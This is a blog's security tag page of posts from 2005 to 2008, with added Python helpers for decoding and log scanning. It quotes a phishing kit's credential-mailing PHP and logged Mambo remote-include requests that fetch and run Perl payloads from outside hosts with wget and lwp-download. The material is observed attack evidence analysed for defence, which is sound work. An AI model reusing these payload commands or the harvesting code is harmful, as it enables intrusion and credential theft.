News items for tag security - Koos van den Hout

2008-06-04 (#)
Sometimes spammers and scammers are so stupid that it becomes amusing again. I just received several mails containing the PHP source of the result-collecting and mailing script of a phishing site. Interesting code snippets:
mail("dongmopascal@gmail.com",$subject,$message,$headers);
But, the scammer gets scammed too. Look at this code snippet:
$ar=array("0"=>"m","1"=>"i","2"=>"e","3"=>"r","4"=>"d","5"=>"a","6"=>"0",
"7"=>"0","8"=>"@","9"=>"h","10"=>"o","11"=>"t","12"=>"m","13"=>"a","14"=>"i",
"15"=>"l.es");
$to=$ar['0'].$ar['1'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['6'].$ar['7'].
$ar['8'].$ar['9'].$ar['10'].$ar['11'].$ar['12'].$ar['13'].$ar['14'].$ar['15'];

mail($to,$subject,$message,$headers);
Takes a bit of decoding, but it seems copies are sent to mierda008@hotmail.es.
The same spammer also mailed a different script with the same function. This script is clear on where to put the dropbox address:
//This is your email
$to = "savepam@gmail.com" ; // Write your email
But in the next lines...
/* EnD Configuration */
$victimIP = pack("H*", "687474703a2f2f667265657363616d732e33782e726f2f656d61696c2e706870");
$DetailsIP = file_get_contents($victimIP, "r");
$DetailsIP = pack("H*", $DetailsIP);
$victimIP unpacks to http://freescams.3x.ro/email.php, so the scammer of the scammer can 'maintain' this and change the dropbox address if needed. Currently that URL shows a page which I think says that the page does not exist. The result is used in the code:
$arr=array($to, $DetailsIP);
foreach ($arr as $to){mail($to, $subj, $msg, $from);}
header("Location: done.html?cmd=_login-run");
You can't trust a good scammer these days, it seems...
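To triage a kit like this without decoding it by hand, here is an added Python helper (not from the post and not part of the kit) that undoes the two hiding tricks quoted above: the per-character array concatenation and the pack("H*") hex literal. The sample source is constructed from the quoted snippets; the regexes only cover these two idioms.

```python
import re
from typing import Dict, List

# Constructed sample: the two hiding tricks quoted above, stitched into one file.
KIT_SOURCE = r'''
$ar=array("0"=>"m","1"=>"i","2"=>"e","3"=>"r","4"=>"d","5"=>"a","6"=>"0",
"7"=>"0","8"=>"@","9"=>"h","10"=>"o","11"=>"t","12"=>"m","13"=>"a","14"=>"i",
"15"=>"l.es");
$to=$ar['0'].$ar['1'].$ar['2'].$ar['3'].$ar['4'].$ar['5'].$ar['6'].$ar['7'].
$ar['8'].$ar['9'].$ar['10'].$ar['11'].$ar['12'].$ar['13'].$ar['14'].$ar['15'];
$victimIP = pack("H*", "687474703a2f2f667265657363616d732e33782e726f2f656d61696c2e706870");
'''

ARRAY_RE = re.compile(r'\$(\w+)\s*=\s*array\((.*?)\);', re.S)           # $ar=array(...);
PAIR_RE = re.compile(r'"(\d+)"\s*=>\s*"([^"]*)"')                         # "0"=>"m"
CONCAT_RE = re.compile(r"\$(\w+)\s*=\s*((?:\$\w+\['\d+'\]\s*\.?\s*)+);", re.S)
LOOKUP_RE = re.compile(r"\$(\w+)\['(\d+)'\]")                             # $ar['12']
PACK_RE = re.compile(r'pack\(\s*"H\*"\s*,\s*"([0-9a-fA-F]+)"\s*\)')       # pack("H*", "...")


def decode_pack_hex(src: str) -> List[str]:
    """Decode every pack("H*", "<hex>") literal; PHP turns the hex pairs into bytes."""
    return [bytes.fromhex(h).decode("latin-1") for h in PACK_RE.findall(src)]


def decode_array_concat(src: str) -> Dict[str, str]:
    """Rebuild strings that are assembled one character at a time from an array literal."""
    tables: Dict[str, Dict[str, str]] = {}
    for name, body in ARRAY_RE.findall(src):
        tables[name] = dict(PAIR_RE.findall(body))
    rebuilt: Dict[str, str] = {}
    for m in CONCAT_RE.finditer(src):
        parts = LOOKUP_RE.findall(m.group(2))
        if all(t in tables and i in tables[t] for t, i in parts):
            rebuilt[m.group(1)] = "".join(tables[t][i] for t, i in parts)
    return rebuilt


def hidden_strings(src: str) -> Dict[str, List[str]]:
    """Everything the kit tried to hide: rebuilt variables plus decoded hex literals."""
    return {"concat": list(decode_array_concat(src).values()),
            "hex": decode_pack_hex(src)}
```

Run against the array exactly as quoted above this yields mierda00@hotmail.es, one character shorter than the address read off by hand.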
2008-05-27 (#)
I have always used ssh-agent to remember keys for me, but lately I started adding a timeout to keys so they are not remembered indefinitely. Especially on my laptop: what if it gets stolen? The keys would still be valid when it comes out of suspend mode. So now I type ssh-add -t 3600 so they are only valid for one hour. But that is still not ideal, as I need to remember that the keys might have been forgotten when I click on a button or menu item in fvwm to start a new xterm-with-ssh. Otherwise I may be thrown out of the session directly or asked for a password or passphrase, depending on the SSH security settings. So, fvwm functions to the rescue:
AddToFunc SSHUR4 "I" Exec if ! ssh-add -l > /dev/null; then ssh-add -t 600 .ssh/id_dsa <&- 2>/dev/null ; fi; uxterm -fg black -bg '#e0e0e0' -geom 80x40 -title 'slogin $0' -vb -e ssh -e none $0 &
Now I can just use SSHR4 host.name and it will ask for the ssh passphrase when needed. In an fvwm menu item:
AddToMenu Remote-Logins "idefix.net%mini-freebsd.xpm%" SSHR4 idefix.net
and in an fvwm button:
*FvwmButtons(Title idefix, Icon mini-freebsd.xpm, Action 'SSHUR4 idefix.net' )
2008-05-26 (#)
I get mail from logcheck daily, and for the last week or so on one nameserver I keep seeing variations of
May 26 09:37:15 gosper named[895]: denied query from [66.238.93.161].26906 for "." NS/IN
May 26 09:56:16 gosper named[895]: denied query from [211.72.249.201].13819 for "." NS/IN
Always those same two IPv4 addresses. With one or two tries it might be a simple attempt to fingerprint my nameservers, but at this rate it looks like an attempt at a denial of service attack. Interestingly, the number of requests is exactly the same for both IPs. 66.238.93.161 and 211.72.249.201 are registered to parts of Asus, from whom I recently downloaded a BIOS update in order to fix some ACPI problems. Related?
2008-03-25 (#)
Not so subtle advice from SANS in the latest SANS NewsBites:
Don't open email attachments unless you were expecting them. Send a note back and ask the person to embed the text in a simple email. This matters to your career. The people who break this rule will be the reason their organization's data are stolen and they won't be able to hide.
2008-03-10 (#)
I found an interesting tidbit in the Apache config today: after setting the AuthLDAPBindPassword directive I could find the password in the server-info output. Which was to be expected, but still an interesting side effect.
2007-10-26 (#)
And while trying to firewall IPv6 I found that INPUT and FORWARD really are separate. From the docs:
the built-in chains INPUT (for packets coming into the box itself), FORWARD (for packets being routed through the box), and OUTPUT (for locally-generated packets).
So if I want to set a policy for both the local machine and the machines behind it, I need to set those rules in both INPUT and FORWARD.
2007-10-03 (#)
It seems Eircom broadband missed the news about WEP being dead (pdf) and WEP being really dead. From The Register: Eircom wireless security flaw revealed
Eircom's director of communications Paul Bradley defended the protocol, however, saying "WEP is an industry standard protocol used by telecoms providers around the world."
Well Paul, just because all the stubborn kids do it, does not mean it is the right choice.
2007-10-02 (#)
Looking for something else I found Blue Box: The VoIP Security Podcast, which talks about (the lack of) VoIP security. I love the name: it refers to attacks on telephony systems being something of all ages, independent of the actual technology. The new age of VoIP just makes new attacks possible. And with different queries I found Blue Boxing Comes to VoIP in the Wired archives. "Phiber Optik" has written a module for Asterisk to make it accept MF (and be bluebox-able).
2007-09-16 (#)
I kept seeing things in the logs like
Sep 16 05:52:39 gosper named[779]: denied query from [143.215.129.200].22632 for "www.capitalone.com" A/IN
all from 143.215.129.200, 143.215.129.102 and 143.215.129.43, without any explanation to be found on the web. The name suggests some sort of study of DNS answers, and all queries seem to be for phishing targets, but several thousand "your query was denied" answers don't make them stop asking. Solution:
iptables -t filter -I INPUT 8 -j REJECT --source 143.215.129.0/24 --protocol udp --dport 53 --reject-with icmp-admin-prohibited
Mail to noc@ was never answered.
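Both this entry and the 2008-05-26 one above are the same "denied query" log line from BIND with a different source pattern: a /24 asking for one phishing target here, two addresses repeating "." NS queries there. Here is an added Python helper (not from the post) that parses those lines and reports the sources above a threshold, per address or per /24; the sample log is constructed from the quoted lines plus a few repeats with made-up ports and times.

```python
import re
from collections import Counter
from typing import Dict, List, Tuple

# BIND "denied query" lines in the format quoted in the entries above.
DENIED_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) named\[\d+\]: '
    r'denied query from \[(?P<ip>[\d.]+)\]\.(?P<port>\d+) '
    r'for "(?P<qname>[^"]*)" (?P<qtype>\w+)/(?P<qclass>\w+)$')

# Constructed sample: quoted lines plus repeats; the last line is not a denial at all.
SAMPLE_LOG = """\
May 26 09:37:15 gosper named[895]: denied query from [66.238.93.161].26906 for "." NS/IN
May 26 09:56:16 gosper named[895]: denied query from [211.72.249.201].13819 for "." NS/IN
May 26 10:12:01 gosper named[895]: denied query from [66.238.93.161].31002 for "." NS/IN
May 26 10:13:44 gosper named[895]: denied query from [211.72.249.201].40311 for "." NS/IN
Sep 16 05:52:39 gosper named[779]: denied query from [143.215.129.200].22632 for "www.capitalone.com" A/IN
Sep 16 05:52:41 gosper named[779]: denied query from [143.215.129.102].1028 for "www.capitalone.com" A/IN
Sep 16 05:53:02 gosper named[779]: denied query from [143.215.129.43].5555 for "www.capitalone.com" A/IN
Sep 16 06:00:00 gosper named[779]: running
"""


def parse_denied(text: str) -> List[Dict[str, str]]:
    """One record per 'denied query' line; everything else in the log is skipped."""
    return [m.groupdict() for m in map(DENIED_RE.match, text.splitlines()) if m]


def network24(ip: str) -> str:
    """143.215.129.200 -> 143.215.129.0/24, so a scanning /24 counts as one source."""
    return ".".join(ip.split(".")[:3]) + ".0/24"


def noisy_sources(records, threshold: int, by_network: bool = False) -> List[Tuple[str, int]]:
    """Sources with at least `threshold` denied queries, busiest first (ties by name)."""
    keyed = Counter(network24(r["ip"]) if by_network else r["ip"] for r in records)
    hits = [(k, n) for k, n in keyed.items() if n >= threshold]
    return sorted(hits, key=lambda kv: (-kv[1], kv[0]))


def root_ns_probers(records) -> List[str]:
    """Sources asking for "." NS, the pattern seen in the 2008-05-26 entry."""
    return sorted({r["ip"] for r in records if r["qname"] == "." and r["qtype"] == "NS"})
```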
2007-04-04 (#)
In wireless security, WEP is now 'broken harder'. Cryptography researchers at the Technische Universität Darmstadt have researched new attacks and written a tool that finds a 104-bit WEP key within 1 minute with a probability of 50%.
2007-03-20 (#)
Nice news bit: Aussies fuming over 'frozen' LG digital TVs: digital content making the software in certain digital receivers from LG freeze up. When a digital bitstream (data) can make the decoding software freeze, it means (to me) that the decoding software does not have enough separation of data and code. Things like table lookups running out of space can make this happen.
2006-07-24 (#)
Paul McNamara writes in an article, Could that be the wireless police knocking?, about a condominium/hotel developer in Tucson, Arizona, US that includes in the regulations for owning a condo the requirement that wireless networks be secured. I'm not sure I see why the developer would get involved in this subject unless they also happen to be the ISP (in which case I would consider 'no choice in ISP' a big downside to the whole deal). Wireless security needs to be addressed, in the right place: informing the public about it, having security by default (like in Siemens Gigaset access points), and not hiding behind a load of unexplained acronyms on a page of the manual (seen in a recent Linksys manual). I really don't think a homeowners association is the place. Although it does fit the profile of 'homeowners associations sticking their nose into everything', which seems to be on the rise in the US. They make the homeowners association of the flat I lived in before look very sane (even when they did do dumb things on account of 'saving property value').
2006-07-15 (#)
From Bruce Schneier's Crypto-Gram: Template for News Stories on Government Data Gathering. A bit of a Dilbert-type joke: too funny and too recognizable.
2006-07-13 (#)
I ended up on the site of Walter Belgers and got lost there in the archive "hackers in de media" (hackers in the media), with lots of newspaper clippings from the years in which I too became interested in computers and security. Nice to read it all again, including the development of the legislation in the Netherlands and the statements of professor Herschberg.
2006-03-15 (#)
Updated the document about how I configure SSH to thwart password guessing, because I finally took the time to find the PAM equivalent of AllowGroups and DenyGroups.
2006-03-09 (#)
Fun story: Peter Cochrane's Blog: Snooping on a BlackBerry fool. Peter Cochrane writes about being on a train and being able to listen in on half of a (loud) pre-sales meeting call, with all details being shouted into the train carriage for everyone to enjoy. A bit of very British humour in it, and a good story about both the annoyance of mobile phones in public places and the privacy/security implications. Found via Bruce Schneier: The Analog Hole / security risks of talking loudly.
2006-02-19 (#)
And 52 hours after my afterthought about mentioning the magic phrase for a web worm, the first attempt:
h58737.serverkompetenz.net - - [18/Feb/2006:23:49:09 +0100] "GET /index.php?_REQUEST[option]=com_content& _REQUEST[Itemid]=1& GLOBALS=& mosConfig_absolute_path=http://www.microsofti.li/tool.gif?& cmd=cd%20/tmp/;lwp-download%20http://www.microsofti.li/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*? HTTP/1.0" 200 3090 "-" "Mozilla/5.0"
2006-02-16 (#)
Finally fetched the source of the Mambo exploit I mentioned before. It does a Google search for "by mambo", and this phrase can be found using Google on The Virtual Bookcase exactly once, in the page about Books by Mambo Ama Mazama. Interesting source to read: a bit of PHP which calls itself Defacing Tool 2.0 by r3v3ng4ns and a bit of Perl which starts an IRC bot on the server bsd.cuti.cz, which allows the usual stuff like taking over the machine and doing portscans. Afterthought: will this host now also get hit because it contains the magic phrase?
2006-02-14 (#)
On The Virtual Bookcase I get loads and loads of requests looking like (broken up for readability): "GET /book/byauthor/index.php? _REQUEST[option]=com_content& _REQUEST[Itemid]=1&GLOBALS=& mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt ?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt; perl%20logs.txt;rm%20-rf%20logs.txt*? HTTP/1.0" 404 2348 "-" "Mozilla/5.0". All fail of course (that's how I notice them). It seems this is a Mambo exploit in use. Funny thing is, I never use Mambo on any site.
I have tried several times to get that tool25.txt to have a look, but it always returns 'The server is temporarily unable to service your request due to the site owner reaching his/her bandwidth limit. Please try again later.'
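The requests in this entry and in the 2006-02-19 one above share one signature: a mosConfig_absolute_path parameter pointing at a remote URL, followed by a cmd parameter. Here is an added Python helper (not from the post) that pulls those requests out of an Apache access log and records the remote include URL, the decoded cmd value and whether the request got a 200 or a 404; the sample log is constructed from the two quoted requests (joined back onto one line each, with a made-up client for the second) plus one harmless request.

```python
import re
from urllib.parse import unquote
from typing import Dict, List, Optional

# Apache combined log: client, timestamp, request line, status (enough for this purpose).
ACCESS_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                       r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) ')

# Constructed sample based on the requests quoted above.
ACCESS_LOG = """\
h58737.serverkompetenz.net - - [18/Feb/2006:23:49:09 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.microsofti.li/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.microsofti.li/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*? HTTP/1.0" 200 3090 "-" "Mozilla/5.0"
192.0.2.10 - - [14/Feb/2006:12:00:00 +0100] "GET /book/byauthor/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.thriftysix.co.uk/tool25.txt?&cmd=cd%20/tmp/;wget%20http://www.thriftysix.co.uk/logs.txt;perl%20logs.txt;rm%20-rf%20logs.txt*? HTTP/1.0" 404 2348 "-" "Mozilla/5.0"
192.0.2.11 - - [14/Feb/2006:12:00:01 +0100] "GET /book/byauthor/index.php?author=Mambo HTTP/1.0" 200 1234 "-" "Mozilla/5.0"
"""


def query_params(target: str) -> Dict[str, str]:
    """Split a request target into percent-decoded key/value pairs (last value wins)."""
    _, _, query = target.partition("?")
    return {unquote(k): unquote(v) for k, _, v in
            (kv.partition("=") for kv in query.split("&") if kv)}


def inspect_request(line: str) -> Optional[Dict[str, object]]:
    """Details of the request if it carries a remote include via mosConfig_absolute_path."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    params = query_params(m.group("target"))
    include = params.get("mosConfig_absolute_path", "")
    if not re.match(r"(?i)https?://", include):
        return None                      # absent or a local value: not this pattern
    return {"client": m.group("client"), "path": m.group("target").partition("?")[0],
            "include_url": include.rstrip("?"), "cmd": params.get("cmd"),
            "status": int(m.group("status")),
            # A 404 (as on The Virtual Bookcase) ran nothing; a 200 only says the path
            # exists and deserves a look at what served it.
            "needs_followup": m.group("status") == "200"}


def scan_access_log(text: str) -> List[Dict[str, object]]:
    """All remote-include attempts in a log, in log order."""
    return [r for r in (inspect_request(line) for line in text.splitlines()) if r]
```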
2005-12-21 (#)
I wrote a bit about how I configure OpenSSH to make it less susceptible to break-in via password guessing.

Koos van den Hout, koos@kzdoos.xs4all.nl, Fax +31-30-2817051. RSS